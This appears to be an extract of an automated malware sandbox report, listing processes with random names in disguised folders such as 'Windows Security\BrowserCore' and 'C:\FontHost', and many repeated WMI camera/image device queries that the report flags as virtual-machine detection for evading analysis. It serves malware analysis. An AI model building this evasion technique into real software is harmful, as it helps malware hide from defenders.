                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
